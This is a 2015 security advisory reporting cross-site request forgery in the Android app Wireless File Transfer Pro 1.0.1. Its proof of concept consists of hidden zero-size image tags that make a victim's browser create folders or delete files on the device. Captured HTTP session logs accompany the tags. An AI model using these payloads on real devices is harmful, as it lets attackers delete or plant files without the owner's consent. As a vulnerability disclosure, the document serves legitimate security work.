Wireless File Transfer Pro version 1.0.1 suffers from multiple cross site request forgery vulnerabilities.
14135bf3ad59a0a749b01822ac0e2d9019544be4e5a8b7b73f77b3942088efbd
Document Title:
===============
Wireless File Transfer Pro 1.0.1 - (Android) CSRF Remote Command Execution (Creat, Delete)
Release Date:
=============
2015-02-10
Product & Service Introduction:
===============================
Wireless File Transfer Pro is the advanced version of Wireless File Transfer.
(Copy of the Vendor Homepage: https://play.google.com/store/apps/details?id=com.lextel.WirelessFileTransferPro )
Affected Product(s):
====================
Wireless File Transfer Pro 5.9.5 - (Android) Web Application 1.0.1
Lextel Technology
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Request Method(s):
[+] [GET]
Vulnerable Module(s):
[+] browse
Vulnerable Parameter(s):
[+] fileExplorer.html?
Affected Module(s):
[+] Index of Documents (http://localhost:8888)
Technical Details & Description:
================================
cross site request forgery has been discovered in the Wireless File Transfer Pro 1.0.1 Android mobile web-application.
The mobile web-application is vulnerable to a combination of cross site request forgery and local command injection attacks.
Proof of Concept (PoC):
=======================
Creat New Folder
<img src="http://192.168.1.2:8888/fileExplorer.html?action=create&type=folder&folderName=test1" width="0" height="0" border="0">
--- PoC Session Logs [GET] (Execution) ---
GET /fileExplorer.html?action=create&type=folder&folderName=test1 HTTP/1.1
Host: 192.168.1.2:8888
User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.2:8888/fileExplorer.html?action=brower&path=/sdcard
Connection: keep-alive
HTTP/1.1 200 OK
Cache-control: no-cache
Content-length: 4
<a href="#" onclick="actionBrower('/sdcard/test1')">test1</a></td></td><td width="24%"></td><td width="24%">2015-02-09 18:12:19</td><td width="15%">
Delete File, Folder
<img src="http://192.168.1.2:8888/fileExplorer.html?action=deleteFile&fileName=test""width="0" height="0" border="0">
--- PoC Session Logs [GET] (Execution) ---
GET /fileExplorer.html?action=deleteFile&fileName=test HTTP/1.1
Host: 192.168.1.2:8888
User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.2:8888/fileExplorer.html?action=brower&path=/sdcard
Connection: keep-alive
HTTP/1.1 200 OK
Cache-control: no-cache
Content-length: 30
Reference:
http://localhost:8888/
Security Risk:
==============
The security risk of the cross site request forgery issue and command injection vulnerability is estimated as medium. (CVSS 4.4)
Credits & Authors:
==================
Hadji Samir s-dz@hotmail.fr